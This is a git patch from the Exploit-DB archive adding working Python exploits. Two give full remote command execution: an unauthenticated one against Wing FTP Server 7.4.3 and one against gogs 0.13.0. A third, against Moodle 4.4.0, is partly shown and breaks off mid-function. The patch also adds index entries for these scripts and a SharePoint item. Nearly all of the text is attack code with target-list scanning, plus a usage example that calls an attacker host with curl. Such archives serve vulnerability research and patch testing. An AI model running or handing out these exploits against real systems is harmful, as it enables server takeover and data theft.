From 83f6bce1ba1b5d4ef669fc9c5434c577d05b3ea4 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 3 Jul 2025 00:16:29 +0000 Subject: [PATCH] DB: 2025-07-03 5 changes to exploits/shellcodes/ghdb gogs 0.13.0 - Remote Code Execution (RCE) Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) Moodle 4.4.0 - Authenticated Remote Code Execution Microsoft SharePoint 2019 - NTLM Authentication --- exploits/multiple/remote/52347.py | 179 ++++++++++++++++++++ exploits/multiple/remote/52348.py | 194 +++++++++++++++++++++ exploits/multiple/webapps/52350.py | 262 +++++++++++++++++++++++++++++ exploits/windows/remote/52349.txt | 57 +++++++ files_exploits.csv | 4 + 5 files changed, 696 insertions(+) create mode 100755 exploits/multiple/remote/52347.py create mode 100755 exploits/multiple/remote/52348.py create mode 100755 exploits/multiple/webapps/52350.py create mode 100644 exploits/windows/remote/52349.txt diff --git a/exploits/multiple/remote/52347.py b/exploits/multiple/remote/52347.py new file mode 100755 index 000000000..696922f75 --- /dev/null +++ b/exploits/multiple/remote/52347.py @@ -0,0 +1,179 @@ +# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE) +# CVE: CVE-2025-47812 +# Date: 2025-06-30 +# Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r) +# Vendor Homepage: https://www.wftpserver.com/ +# Version: Wing FTP Server <= 7.4.3 +# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges) + +# Description: +# Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated remote code execution (RCE) +# flaw (CVE-2025-47812). This vulnerability arises from improper handling of NULL bytes in the 'username' +# parameter during login, leading to Lua code injection into session files. These maliciously crafted +# session files are subsequently executed when authenticated functionalities (e.g., /dir.html) are accessed, +# resulting in arbitrary command execution on the server with elevated privileges (root on Linux, SYSTEM on Windows). +# The exploit leverages a discrepancy between the string processing in c_CheckUser() (which truncates at NULL) +# and the session creation logic (which uses the full unsanitized username). + +# Proof-of-Concept (Python): +# The provided Python script automates the exploitation process. +# It injects a NULL byte followed by Lua code into the username during a POST request to loginok.html. +# Upon successful authentication (even anonymous), a UID cookie is returned. +# A subsequent GET request to dir.html using this UID cookie triggers the execution of the injected Lua code, +# leading to RCE. + + +import requests +import re +import argparse + +# ANSI color codes +RED = "\033[91m" +GREEN = "\033[92m" +RESET = "\033[0m" + +def print_green(text): + print(f"{GREEN}{text}{RESET}") + +def print_red(text): + print(f"{RED}{text}{RESET}") + +def run_exploit(target_url, command, username="anonymous", verbose=False): + login_url = f"{target_url}/loginok.html" + + login_headers = { + "Host": target_url.split('//')[1].split('/')[0], + "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate, br", + "Content-Type": "application/x-www-form-urlencoded", + "Origin": target_url, + "Connection": "keep-alive", + "Referer": f"{target_url}/login.html?lang=english", + "Cookie": "client_lang=english", + "Upgrade-Insecure-Requests": "1", + "Priority": "u=0, i" + } + + + from urllib.parse import quote + encoded_username = quote(username) + + payload = ( + f"username={encoded_username}%00]]%0dlocal+h+%3d+io.popen(\"{command}\")%0dlocal+r+%3d+h%3aread(\"*a\")" + "%0dh%3aclose()%0dprint(r)%0d--&password=" + ) + + if verbose: + print_green(f"[+] Sending POST request to {login_url} with command: '{command}' and username: '{username}'") + + try: + login_response = requests.post(login_url, headers=login_headers, data=payload, timeout=10) + login_response.raise_for_status() + except requests.exceptions.RequestException as e: + print_red(f"[-] Error sending POST request to {login_url}: {e}") + return False + + set_cookie = login_response.headers.get("Set-Cookie", "") + match = re.search(r'UID=([^;]+)', set_cookie) + + if not match: + print_red("[-] UID not found in Set-Cookie. Exploit might have failed or response format changed.") + return False + + uid = match.group(1) + if verbose: + print_green(f"[+] UID extracted: {uid}") + + dir_url = f"{target_url}/dir.html" + dir_headers = { + "Host": login_headers["Host"], + "User-Agent": login_headers["User-Agent"], + "Accept": login_headers["Accept"], + "Accept-Language": login_headers["Accept-Language"], + "Accept-Encoding": login_headers["Accept-Encoding"], + "Connection": "keep-alive", + "Cookie": f"UID={uid}", + "Upgrade-Insecure-Requests": "1", + "Priority": "u=0, i" + } + + if verbose: + print_green(f"[+] Sending GET request to {dir_url} with UID: {uid}") + + try: + dir_response = requests.get(dir_url, headers=dir_headers, timeout=10) + dir_response.raise_for_status() + except requests.exceptions.RequestException as e: + print_red(f"[-] Error sending GET request to {dir_url}: {e}") + return False + + body = dir_response.text + clean_output = re.split(r'<\?xml', body)[0].strip() + + if verbose: + print_green("\n--- Command Output ---") + print(clean_output) + print_green("----------------------") + else: + if clean_output: + print_green(f"[+] {target_url} is vulnerable!") + else: + print_red(f"[-] {target_url} is NOT vulnerable.") + + return bool(clean_output) + +def main(): + parser = argparse.ArgumentParser(description="Exploit script for command injection via login.html.") + parser.add_argument("-u", "--url", type=str, + help="Target URL (e.g., http://192.168.134.130). Required if -f not specified.") + parser.add_argument("-f", "--file", type=str, + help="File containing list of target URLs (one per line).") + parser.add_argument("-c", "--command", type=str, + help="Custom command to execute. Default: whoami. If specified, verbose output is enabled automatically.") + parser.add_argument("-v", "--verbose", action="store_true", + help="Show full command output (verbose mode). Ignored if -c is used since verbose is auto-enabled.") + parser.add_argument("-o", "--output", type=str, + help="File to save vulnerable URLs.") + parser.add_argument("-U", "--username", type=str, default="anonymous", + help="Username to use in the exploit payload. Default: anonymous") + + args = parser.parse_args() + + if not args.url and not args.file: + parser.error("Either -u/--url or -f/--file must be specified.") + + command_to_use = args.command if args.command else "whoami" + verbose_mode = True if args.command else args.verbose + + vulnerable_sites = [] + + targets = [] + if args.file: + try: + with open(args.file, 'r') as f: + targets = [line.strip() for line in f if line.strip()] + except Exception as e: + print_red(f"[-] Could not read target file '{args.file}': {e}") + return + else: + targets = [args.url] + + for target in targets: + print(f"\n[*] Testing target: {target}") + is_vulnerable = run_exploit(target, command_to_use, username=args.username, verbose=verbose_mode) + if is_vulnerable: + vulnerable_sites.append(target) + + if args.output and vulnerable_sites: + try: + with open(args.output, 'w') as out_file: + for site in vulnerable_sites: + out_file.write(site + "\n") + print_green(f"\n[+] Vulnerable sites saved to: {args.output}") + except Exception as e: + print_red(f"[-] Could not write to output file '{args.output}': {e}") + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/remote/52348.py b/exploits/multiple/remote/52348.py new file mode 100755 index 000000000..ede3e5daf --- /dev/null +++ b/exploits/multiple/remote/52348.py @@ -0,0 +1,194 @@ +# Exploit Title: gogs 0.13.0 - Remote Code Execution (RCE) +# Date: 27th June, 2025 +# Exploit Author: Ardayfio Samuel Nii Aryee +# Software link: https://github.com/gogs/gogs.git +# Version: gogs <=0.13.0 +# Tested on: Ubuntu +# CVE: CVE-2024-39930 + + +# =============================== +# Example Usage: +# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "touch /tmp/pwned" +# python3 exploit.py http://gogs.local:3000 alice:password123 ~/.ssh/id_rsa ~/.ssh/id_rsa.pub "curl http://atacker.com" --ssh-port 2222 +# =============================== + +import requests +import paramiko +import base64 +import random +import string +import sys +import argparse +from urllib.parse import urlparse + +API_BASE_URL = "" + +def generate_random_string(length=8, charset=None): + if charset is None: + charset = string.ascii_letters + string.digits + return ''.join(random.choices(charset, k=length)) + +def make_headers(token=None, basic_auth=None): + headers = {"Content-Type": "application/json"} + if token: + headers["Authorization"] = f"token {token}" + elif basic_auth: + b64 = base64.b64encode(basic_auth.encode()).decode() + headers["Authorization"] = f"Basic {b64}" + return headers + +def http_post(path, json=None, headers=None): + url = f"{API_BASE_URL}{path}" + response = requests.post(url, json=json, headers=headers) + response.raise_for_status() + return response + +def http_get(path, headers=None): + url = f"{API_BASE_URL}{path}" + response = requests.get(url, headers=headers) + response.raise_for_status() + return response + +def http_delete(path, headers=None): + url = f"{API_BASE_URL}{path}" + response = requests.delete(url, headers=headers) + response.raise_for_status() + return response + +def obtain_api_token(username, password): + auth = f"{username}:{password}" + headers = make_headers(basic_auth=auth) + data = {"name": generate_random_string()} + + try: + response = http_post(f"/users/{username}/tokens", json=data, headers=headers) + token = response.json()['sha1'] + print(f"[+] API Token Acquired: {token}") + return token + except Exception as e: + print(f"[!] Failed to obtain API token: {e}") + sys.exit(1) + +def create_repo(token): + repo_name = generate_random_string() + headers = make_headers(token=token) + data = { + "name": repo_name, + "description": "Auto-created repository", + "private": False + } + + try: + response = http_post("/user/repos", json=data, headers=headers) + full_name = response.json()['full_name'] + print(f"[+] Repository Created: {full_name}") + return full_name + except Exception as e: + print(f"[!] Failed to create repository: {e}") + sys.exit(1) + +def delete_existing_ssh_keys(token): + headers = make_headers(token=token) + try: + response = http_get("/user/keys", headers=headers) + keys = response.json() + for key in keys: + key_id = key['id'] + http_delete(f"/user/keys/{key_id}", headers=headers) + print(f"[+] Deleted SSH Key ID: {key_id}") + except Exception as e: + print(f"[!] Failed to delete existing SSH keys: {e}") + sys.exit(1) + +def add_ssh_key(public_key_path, token): + delete_existing_ssh_keys(token) + + try: + with open(public_key_path, 'r') as f: + key = f.read() + except Exception as e: + print(f"[!] Failed to read public key file: {e}") + sys.exit(1) + + headers = make_headers(token=token) + data = { + "title": generate_random_string(), + "key": key + } + + try: + response = http_post("/user/keys", json=data, headers=headers) + print(f"[+] SSH Key Added: {response.status_code}") + except Exception as e: + print(f"[!] Failed to add SSH key: {e}") + sys.exit(1) + +def exploit(ssh_user, ssh_host, ssh_port, private_key_path, repo_path, command): + try: + key = paramiko.RSAKey.from_private_key_file(private_key_path) + except Exception as e: + print(f"[!] Failed to load SSH key: {e}") + sys.exit(1) + + try: + client = paramiko.SSHClient() + client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + client.connect(hostname=ssh_host, port=int(ssh_port), username=ssh_user, pkey=key) + + session = client.get_transport().open_session() + + print("[+] Executing command...... ") + session.set_environment_variable("--split-string", command) + session.exec_command(f"git-upload-pack {repo_path}") + + stdout = session.makefile('rb', 1024) + stderr = session.makefile_stderr('rb', 1024) + + print("STDERR:", stderr.read().decode()) + print("STDOUT:", stdout.read().decode()) + + session.close() + client.close() + except Exception as e: + print(f"[!] Error: {e}") + sys.exit(1) + +def main(): + global API_BASE_URL + + parser = argparse.ArgumentParser(description="Exploit Gogs SSH argument injection (CVE-2024-39930)") + parser.add_argument("url", help="Gogs application URL (e.g., http://skillforge.lab:3000)") + parser.add_argument("auth", help="Gogs credentials in the format username:password") + parser.add_argument("private_key", help="Path to private SSH key") + parser.add_argument("public_key", help="Path to public SSH key") + parser.add_argument("command", help="Command to execute remotely") + parser.add_argument("--ssh-port", type=int, default=None, help="Optional: custom SSH port to use") + args = parser.parse_args() + + parsed_url = urlparse(args.url) + API_BASE_URL = f"{parsed_url.scheme}://{parsed_url.netloc}/api/v1" + ssh_host = parsed_url.hostname + ssh_port = args.ssh_port if args.ssh_port else (parsed_url.port or 22) + + try: + username, password = args.auth.split(":") + except ValueError: + print("[!] Invalid format for auth argument") + sys.exit(1) + + token = obtain_api_token(username, password) + repo_path = create_repo(token) + add_ssh_key(args.public_key, token) + + exploit( + ssh_user=username, + ssh_host=ssh_host, + ssh_port=ssh_port, + private_key_path=args.private_key, + repo_path=repo_path, + command=args.command + ) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/multiple/webapps/52350.py b/exploits/multiple/webapps/52350.py new file mode 100755 index 000000000..ec0b463ca --- /dev/null +++ b/exploits/multiple/webapps/52350.py @@ -0,0 +1,262 @@ +# Exploit Title: Moodle 4.4.0 - Authenticated Remote Code Execution +# Exploit Author: Likhith Appalaneni +# Vendor Homepage: https://moodle.org +# Software Link: https://github.com/moodle/moodle/releases/tag/v4.4.0 +# Tested Version: Moodle 4.4.0 +# Affected versions: 4.4 to 4.4.1, 4.3 to 4.3.5, 4.2 to 4.2.8, 4.1 to 4.1.11 +# Tested On: Ubuntu 22.04, Apache2, PHP 8.2 +# CVE: CVE-2024-43425 +# References: +# - https://github.com/aninfosec/CVE-2024-43425-Poc +# - https://nvd.nist.gov/vuln/detail/CVE-2024-43425 + +import argparse +import requests +import re +import sys +import subprocess +from bs4 import BeautifulSoup +import urllib.parse + +requests.packages.urllib3.disable_warnings() + +def get_login_token(session, login_url): + print("[*] Step 1: GET /login/index.php to extract login token") + try: + response = session.get(login_url, verify=False) + if response.status_code != 200: + print(f"[-] Unexpected status code {response.status_code} when accessing login page") + sys.exit(1) + except Exception as e: + print(f"[-] Error connecting to {login_url}: {e}") + sys.exit(1) + + soup = BeautifulSoup(response.text, "html.parser") + token_input = soup.find("input", {"name": "logintoken"}) + if not token_input or not token_input.get("value"): + print("[-] Failed to extract login token from HTML") + sys.exit(1) + + token = token_input["value"] + print(f"[+] Found login token: {token}") + return token + +def perform_login(session, login_url, username, password, token): + print("[*] Step 2: POST /login/index.php with credentials") + login_payload = { + "anchor": "", + "logintoken": token, + "username": username, + "password": password, + } + try: + response = session.post( + login_url, + data=login_payload, + headers={"Content-Type": "application/x-www-form-urlencoded"}, + verify=False, + ) + if response.status_code not in [200, 303]: + print(f"[-] Unexpected response code during login: {response.status_code}") + sys.exit(1) + except Exception as e: + print(f"[-] Login POST failed: {e}") + sys.exit(1) + + if "MoodleSession" not in session.cookies.get_dict(): + print("[-] Login may have failed: MoodleSession cookie missing") + sys.exit(1) + + print("[+] Logged in successfully.") + +def get_quiz_info(session, base_url, cmid): + print("[*] Extracting sesskey, courseContextId, and category from quiz edit page...") + quiz_edit_url = f"{base_url}/mod/quiz/edit.php?cmid={cmid}" + try: + resp = session.get(quiz_edit_url, verify=False) + if resp.status_code != 200: + print(f"[-] Failed to load quiz edit page. Status: {resp.status_code}") + sys.exit(1) + # Extract sesskey + sesskey_match = re.search(r'"sesskey":"([a-zA-Z0-9]+)"', resp.text) + # Extract courseContextId + ctxid_match = re.search(r'"courseContextId":(\d+)', resp.text) + # Extract category + category_match = re.search(r';category=(\d+)', resp.text) + if not (sesskey_match and ctxid_match and category_match): + print("[-] Could not extract sesskey, courseContextId, or category") + print(resp.text[:1000]) + sys.exit(1) + sesskey = sesskey_match.group(1) + ctxid = ctxid_match.group(1) + category = category_match.group(1) + print(f"[+] Found sesskey: {sesskey}") + print(f"[+] Found courseContextId: {ctxid}") + print(f"[+] Found category: {category}") + return sesskey, ctxid, category + except Exception as e: + print(f"[-] Exception while extracting quiz info: {e}") + sys.exit(1) + +def upload_calculated_question(session, base_url, sesskey, cmid, courseid, category, ctxid): + print("[*] Step 3: Uploading calculated question with payload...") + url = f"{base_url}/question/bank/editquestion/question.php" + payload = "(1)->{system($_GET[chr(97)])}" + post_data = { + "initialcategory": 1, + "reload": 1, + "shuffleanswers": 1, + "answernumbering": "abc", + "mform_isexpanded_id_answerhdr": 1, + "noanswers": 1, + "nounits": 1, + "numhints": 2, + "synchronize": "", + "wizard": "datasetdefinitions", + "id": "", + "inpopup": 0, + "cmid": cmid, + "courseid": courseid, + "returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0", + "mdlscrollto": 0, + "appendqnumstring": "addquestion", + "qtype": "calculated", + "makecopy": 0, + "sesskey": sesskey, + "_qf__qtype_calculated_edit_form": 1, + "mform_isexpanded_id_generalheader": 1, + "category": f"{category},{ctxid}", + "name": "exploit", + "questiontext[text]": "

test

", + "questiontext[format]": 1, + "questiontext[itemid]": 623548580, + "status": "ready", + "defaultmark": 1, + "generalfeedback[text]": "", + "generalfeedback[format]": 1, + "generalfeedback[itemid]": 21978947, + "answer[0]": payload, + "fraction[0]": 1.0, + "tolerance[0]": 0.01, + "tolerancetype[0]": 1, + "correctanswerlength[0]": 2, + "correctanswerformat[0]": 1, + "feedback[0][text]": "", + "feedback[0][format]": 1, + "feedback[0][itemid]": 281384971, + "unitrole": 3, + "penalty": 0.3333333, + "hint[0][text]": "", + "hint[0][format]": 1, + "hint[0][itemid]": 812786292, + "hint[1][text]": "", + "hint[1][format]": 1, + "hint[1][itemid]": 795720000, + "tags": "_qf__force_multiselect_submission", + "submitbutton": "Save changes" + } + try: + res = session.post(url, data=post_data, verify=False, allow_redirects=False) + if res.status_code in [302, 303] and "Location" in res.headers and "&id=" in res.headers["Location"]: + print("[+] Question upload request sent. Extracting question ID from redirect.") + qid = re.search(r"&id=(\d+)", res.headers["Location"]) + if not qid: + print("[-] Could not extract question ID from redirect.") + sys.exit(1) + return qid.group(1) + else: + print(f"[-] Upload failed. Status code: {res.status_code}") + sys.exit(1) + except Exception as e: + print(f"[-] Upload exception: {e}") + sys.exit(1) + +def post_dataset_wizard(session, base_url, question_id, sesskey, cmid, courseid, category, ctxid): + print("[*] Step 4: Completing dataset wizard with dataset[0]=0") + wizard_url = f"{base_url}/question/bank/editquestion/question.php?wizardnow=datasetdefinitions" + data_payload = { + "id": question_id, + "inpopup": 0, + "cmid": cmid, + "courseid": courseid, + "returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0", + "mdlscrollto": 0, + "appendqnumstring": "addquestion", + "category": f"{category},{ctxid}", + "wizard": "datasetitems", + "sesskey": sesskey, + "_qf__question_dataset_dependent_definitions_form": 1, + "dataset[0]": 0, + "synchronize": 0, + "submitbutton": "Next page" + } + try: + res = session.post(wizard_url, data=data_payload, verify=False) + if res.status_code == 200: + print("[+] Dataset wizard POST submitted.") + return False + elif "Exception - system(): Argument #1 ($command) cannot be empty" in res.text: + print("[+] Reached expected error page. Payload is being interpreted.") + return True + else: + print(f"[-] Dataset wizard POST failed with status: {res.status_code}") + return False + except Exception as e: + print(f"[-] Exception during dataset wizard step: {e}") + return False + +def trigger_rce(session, base_url, question_id, category, cmid, courseid, cmd): + print("[*] Step 5: Triggering command: {cmd}") + encoded = urllib.parse.quote(cmd) + trigger_url = ( + f"{base_url}/question/bank/editquestion/question.php?id={question_id}" + f"&category={category}&cmid={cmid}&courseid={courseid}" + f"&wizardnow=datasetitems&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D{cmid}%26addonpage%3D0" + f"&appendqnumstring=addquestion&mdlscrollto=0&a={encoded}" + ) + try: + resp = session.get(trigger_url, verify=False) + print("[+] Trigger request sent. Output below:\n") + lines = resp.text.splitlines() + output_lines = [] + for line in lines: + if " \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 098b514d1..1cc6a1f9c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10988,6 +10988,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 21295,exploits/multiple/remote/21295.txt,"GNUJSP 1.0 - File Disclosure",2002-02-19,"Thomas Springer",remote,multiple,,2002-02-19,2012-09-12,1,CVE-2002-0300;OSVDB-5323,,,,,https://www.securityfocus.com/bid/4125/info 47439,exploits/multiple/remote/47439.txt,"GoAhead 2.5.0 - Host Header Injection",2019-09-30,Ramikan,remote,multiple,,2019-09-30,2019-09-30,0,CVE-2019-16645,,,,, 43877,exploits/multiple/remote/43877.rb,"GoAhead Web Server 2.5 < 3.6.5 - HTTPd 'LD_PRELOAD' Arbitrary Module Load (Metasploit)",2018-01-24,Metasploit,remote,multiple,,2018-01-24,2018-01-25,1,CVE-2017-17562,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/aae77fc1a47149d43747ad9513e6f778553ab82c/modules/exploits/linux/http/goahead_ldpreload.rb +52348,exploits/multiple/remote/52348.py,"gogs 0.13.0 - Remote Code Execution (RCE)",2025-07-02,cybersploit,remote,multiple,,2025-07-02,2025-07-02,0,CVE-2024-39930,,,,, 33064,exploits/multiple/remote/33064.txt,"Google Chrome 0.3.154 - 'JavaScript:' URI in 'Refresh' Header Cross-Site Scripting",2009-06-03,MustLive,remote,multiple,,2009-06-03,2014-04-28,1,CVE-2009-2352;OSVDB-56478,,,,,https://www.securityfocus.com/bid/35572/info 33123,exploits/multiple/remote/33123.html,"Google Chrome 2.0.172 - 'About:blank' Address Bar URI Spoofing 'About:blank' Address Bar URI Spoofing",2009-06-28,Lostmon,remote,multiple,,2009-06-28,2014-04-30,1,,,,,,https://www.securityfocus.com/bid/35839/info 33124,exploits/multiple/remote/33124.txt,"Google Chrome 2.0.172 - 'chrome://history/' URI Cross-Site Scripting",2009-06-28,"Karn Ganeshen",remote,multiple,,2009-06-28,2014-04-30,1,,,,,,https://www.securityfocus.com/bid/35841/info @@ -11686,6 +11687,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 689,exploits/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,remote,multiple,,2004-12-14,2016-04-19,1,,,,,http://www.exploit-db.comwget-1.9.tar.gz, 31106,exploits/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - Remote Buffer Overflow / Authentication Bypass",2008-02-04,"Luigi Auriemma",remote,multiple,,2008-02-04,2014-01-28,1,CVE-2008-5159;OSVDB-42861,,,,,https://www.securityfocus.com/bid/27614/info 33067,exploits/multiple/remote/33067.txt,"Winds3D Viewer 3 - 'GetURL()' Arbitrary File Download",2009-06-08,"Diego Juarez",remote,multiple,,2009-06-08,2014-05-01,1,CVE-2009-2386;OSVDB-55863,,,,,https://www.securityfocus.com/bid/35595/info +52347,exploits/multiple/remote/52347.py,"Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)",2025-07-02,4m3rr0r,remote,multiple,,2025-07-02,2025-07-02,0,CVE-2025-47812,,,,, 16292,exploits/multiple/remote/16292.rb,"Wireshark - LWRES Dissector getaddrsbyname_request Buffer Overflow (Loop) (Metasploit)",2010-11-24,Metasploit,remote,multiple,,2010-11-24,2011-07-15,1,CVE-2010-0304;OSVDB-61987,"Metasploit Framework (MSF)",,,http://www.exploit-db.comwireshark-win32-1.2.0.zip, 31941,exploits/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Directory Traversal",2008-06-20,"Tan Chew Keong",remote,multiple,,2008-06-20,2014-02-27,1,CVE-2008-2889;OSVDB-46537,,,,,https://www.securityfocus.com/bid/29844/info 19667,exploits/multiple/remote/19667.c,"WolfPack Development XSHIPWARS 1.0/1.2.4 - Remote Buffer Overflow",1999-12-09,"Amanda Woodward",remote,multiple,,1999-12-09,2017-11-15,1,CVE-1999-0972;OSVDB-1158,,,,,https://www.securityfocus.com/bid/863/info @@ -12199,6 +12201,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49830,exploits/multiple/webapps/49830.js,"Moeditor 0.2.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,, 49184,exploits/multiple/webapps/49184.txt,"mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting",2020-12-03,"Sagar Banwa",webapps,multiple,,2020-12-03,2020-12-03,0,,,,,, 49582,exploits/multiple/webapps/49582.txt,"Monica 2.19.1 - 'last_name' Stored XSS",2021-02-23,BouSalman,webapps,multiple,,2021-02-23,2021-02-23,0,CVE-2021-27370,,,,, +52350,exploits/multiple/webapps/52350.py,"Moodle 4.4.0 - Authenticated Remote Code Execution",2025-07-02,"Likhith Appalaneni",webapps,multiple,,2025-07-02,2025-07-02,0,CVE-2024-43425,,,,, 51499,exploits/multiple/webapps/51499.txt,"MotoCMS Version 3.4.3 - Server-Side Template Injection (SSTI)",2023-05-31,tmrswrr,webapps,multiple,,2023-05-31,2023-05-31,0,,,,,, 50518,exploits/multiple/webapps/50518.txt,"Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)",2021-11-12,"Shain Lakin",webapps,multiple,,2021-11-12,2021-11-12,0,,,,,, 9898,exploits/multiple/webapps/9898.txt,"Mura CMS 5.1 - Root Path Disclosure",2009-10-29,"Vladimir Vorontsov",webapps,multiple,,2009-10-28,,1,OSVDB-59579,,,,, @@ -44572,6 +44575,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 16373,exploits/windows/remote/16373.rb,"Microsoft Services - 'nwapi32.dll' (MS06-066) (Metasploit)",2010-08-25,Metasploit,remote,windows,,2010-08-25,2011-03-07,1,CVE-2006-4688;OSVDB-30260;MS06-066,"Metasploit Framework (MSF)",,,, 16369,exploits/windows/remote/16369.rb,"Microsoft Services - 'nwwks.dll' (MS06-066) (Metasploit)",2010-05-09,Metasploit,remote,windows,,2010-05-09,2011-03-07,1,CVE-2006-4688;OSVDB-30260;MS06-066,"Metasploit Framework (MSF)",,,, 48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,,2020-02-11,2020-02-11,0,CVE-2019-0604,,,,, +52349,exploits/windows/remote/52349.txt,"Microsoft SharePoint 2019 - NTLM Authentication",2025-07-02,nu11secur1ty,remote,windows,,2025-07-02,2025-07-02,0,CVE-2025-47166,,,,, 31632,exploits/windows/remote/31632.txt,"Microsoft SharePoint Server 2.0 - Picture Source HTML Injection",2008-04-09,OneIdBeagl3,remote,windows,,2008-04-09,2014-02-13,1,CVE-2008-1888;OSVDB-44459,,,,,https://www.securityfocus.com/bid/28706/info 29951,exploits/windows/remote/29951.txt,"Microsoft SharePoint Server 3.0 - Cross-Site Scripting",2007-05-04,Solarius,remote,windows,,2007-05-04,2013-12-01,1,CVE-2007-2581,,,,,https://www.securityfocus.com/bid/23832/info 20305,exploits/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - Arbitrary File Upload",1999-01-30,Mnemonix,remote,windows,,1999-01-30,2012-08-07,1,CVE-1999-0360;OSVDB-5884,,,,,https://www.securityfocus.com/bid/1811/info